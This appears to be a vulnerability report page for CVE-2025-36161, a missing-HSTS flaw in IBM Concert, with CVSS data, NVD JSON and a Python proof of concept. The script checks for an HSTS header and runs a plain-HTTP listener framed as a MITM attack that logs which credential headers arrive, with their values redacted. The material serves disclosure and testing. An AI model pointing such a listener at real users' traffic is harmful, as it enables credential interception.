Security Vulnerability Report
CVE-2025-36161 CVSS 5.9 MEDIUM

CVE-2025-36161

Published: 2025-11-20 16:15:58
Last Modified: 2025-11-24 14:47:51

Description

IBM Concert 1.0.0 through 2.0.0 could allow a remote attacker to obtain sensitive information, caused by the failure to properly enable HTTP Strict-Transport-Security. An attacker could exploit this vulnerability to obtain sensitive information using man in the middle techniques.

CVSS Details

CVSS Score
5.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:ibm:concert:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:* - NOT VULNERABLE
IBM Concert 1.0.0
IBM Concert 1.1.0
IBM Concert 1.2.0
IBM Concert 1.3.0
IBM Concert 1.4.0
IBM Concert 1.5.0
IBM Concert 2.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
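# CVE-2025-36161 PoC - HSTS Bypass via MITM
# This PoC demonstrates the HSTS bypass vulnerability in IBM Concert
#
# What the script actually does:
#   * check_hsts_header() fetches a URL over HTTPS and reports whether the
#     response carries an *effective* Strict-Transport-Security policy
#     (header present with a non-zero max-age, RFC 6797).
#   * HSTSInterceptor / start_mitm_proxy() run a plain-HTTP listener that
#     logs which credential-bearing headers reach it.  It does not position
#     itself in anyone's traffic; it only shows what a client that was
#     downgraded to HTTP would send in the clear.  Header values are redacted
#     so the harness itself never writes credentials to stdout.
import http.server
import socketserver
import ssl
import sys
import threading
from urllib.parse import urlparse

# Request headers whose presence is reported; their values are never printed.
SENSITIVE_HEADERS = ("Cookie", "Authorization")


class HSTSInterceptor(http.server.SimpleHTTPRequestHandler):
    """
    Plain-HTTP request handler that logs what a downgraded client would leak.

    Used to illustrate why a missing HSTS header matters: without the policy
    a browser may follow an http:// link or a captive-portal redirect, and any
    cookies or Authorization header it attaches travel unencrypted.  Only the
    names and lengths of sensitive headers are logged; the values are not.
    """

    def do_GET(self):
        """Log the request metadata and answer with a fixed HTML page."""
        print(f"[ATTACK] Intercepted request: {self.path}")
        print(f"[ATTACK] Source IP: {self.client_address[0]}")
        # Header names only: Cookie/Authorization values are session secrets.
        print(f"[ATTACK] Headers: {list(self.headers.keys())}")

        # Report presence (and size) of credential-bearing headers, redacted.
        for name in SENSITIVE_HEADERS:
            value = self.headers.get(name)
            if value is not None:
                print(f"[CRITICAL] {name} header intercepted "
                      f"({len(value)} bytes, value redacted)")

        # Fixed response; the page is static and carries no request data.
        self.send_response(200)
        self.send_header('Content-type', 'text/html')
        self.end_headers()
        response = """
<html>
<body>
<h1>MITM Attack Successful</h1>
<p>No HSTS header detected. Traffic can be intercepted.</p>
</body>
</html>
"""
        self.wfile.write(response.encode())

    def log_message(self, format, *args):
        # Suppress the per-request stderr line from BaseHTTPRequestHandler;
        # do_GET already prints everything this harness wants to show.
        pass


def force_https(url):
    """
    Return *url* rewritten to use the https scheme.

    A bare host ("example.com", "example.com/path") gets "https://" prepended;
    any other scheme ("http://...") is replaced.  An https URL is returned
    unchanged.  Using the URL parser instead of a prefix str.replace avoids
    mangling URLs that do not start with "http" at all.
    """
    if '://' not in url:
        return 'https://' + url
    parts = urlparse(url)
    if parts.scheme == 'https':
        return url
    return parts._replace(scheme='https').geturl()


def hsts_max_age(header_value):
    """
    Return the max-age directive of a Strict-Transport-Security value.

    Returns an int, or None when *header_value* is None/empty or carries no
    parseable max-age.  RFC 6797 makes max-age mandatory, and a value of 0
    instructs the browser to drop the host from its HSTS list, so "header
    present but max-age=0" is not an enabled policy.  Directive names are
    case-insensitive; a quoted value is accepted.
    """
    if not header_value:
        return None
    for directive in header_value.split(';'):
        name, _, raw = directive.partition('=')
        if name.strip().lower() != 'max-age':
            continue
        raw = raw.strip().strip('"')
        return int(raw) if raw.isdigit() else None
    return None


def check_hsts_header(url):
    """
    Check whether *url* serves an effective HSTS policy.

    The URL is forced to https first: browsers ignore the header on plain
    HTTP, so only the TLS response counts.  Returns True when the response
    carries Strict-Transport-Security with a non-zero max-age, False when the
    header is absent or ineffective.  A network/TLS failure is reported as
    [ERROR] and also returns False (the policy could not be observed); callers
    that need to tell the two apart should look at the printed output.
    """
    import urllib.request
    from urllib.error import HTTPError

    url = force_https(url)
    req = urllib.request.Request(url)
    try:
        with urllib.request.urlopen(req, timeout=10) as response:
            headers = response.headers
    except HTTPError as err:
        # 4xx/5xx responses must carry the policy too; judge the header, not
        # the status, instead of treating the error as "no HSTS".
        headers = err.headers
    except (OSError, ValueError) as e:
        # URLError, socket timeouts and SSL errors are OSError subclasses;
        # ValueError covers a malformed URL.
        print(f"[ERROR] Failed to check HSTS: {e}")
        return False

    strict_transport_security = headers.get('Strict-Transport-Security')
    if hsts_max_age(strict_transport_security):
        print(f"[✓] HSTS header found: {strict_transport_security}")
        return True
    if strict_transport_security is not None:
        print(f"[✗] HSTS header present but not effective "
              f"(max-age missing or 0): {strict_transport_security}")
    else:
        print("[✗] HSTS header NOT found - vulnerable to MITM attack")
    return False


def start_mitm_proxy(port=8080, host=""):
    """
    Start the plain-HTTP logging listener and serve until interrupted.

    *host* defaults to "" (all interfaces) for compatibility with the original
    call signature; pass "127.0.0.1" when running the harness on a shared
    machine so the listener is not reachable from the network.  Blocks in
    serve_forever(); the socket is released by the context manager on exit.
    """
    with socketserver.TCPServer((host, port), HSTSInterceptor) as httpd:
        print(f"[ATTACK] MITM proxy listening on port {port}")
        httpd.serve_forever()


if __name__ == "__main__":
    # The target may be given as the first argument; the default is a
    # placeholder hostname, not a real deployment.
    target_url = sys.argv[1] if len(sys.argv) > 1 else "https://ibm-concert.example.com"
    print(f"[*] Checking HSTS configuration for: {target_url}")
    print("-" * 50)
    has_hsts = check_hsts_header(target_url)
    if not has_hsts:
        print("\n[!] VULNERABLE: Server does not implement HSTS")
        print("[!] Attackers can perform MITM to intercept sensitive data")
        print("[!] Recommendation: Enable HSTS header on server")
    else:
        print("\n[✓] Server properly implements HSTS protection")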

References

Raw JSON Data

{"cve": {"id": "CVE-2025-36161", "sourceIdentifier": "[email protected]", "published": "2025-11-20T16:15:58.330", "lastModified": "2025-11-24T14:47:51.040", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM Concert 1.0.0 through 2.0.0 could allow a remote attacker to obtain sensitive information, caused by the failure to properly enable HTTP Strict-Transport-Security. An attacker could exploit this vulnerability to obtain sensitive information using man in the middle techniques."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-327"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:concert:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.0.0", "versionEndExcluding": "2.1.0", "matchCriteriaId": "43072AC2-05A5-41A3-9E79-E0AF2C5AD3FF"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "matchCriteriaId": "703AF700-7A70-47E2-BC3A-7FD03B3CA9C1"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7252019", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}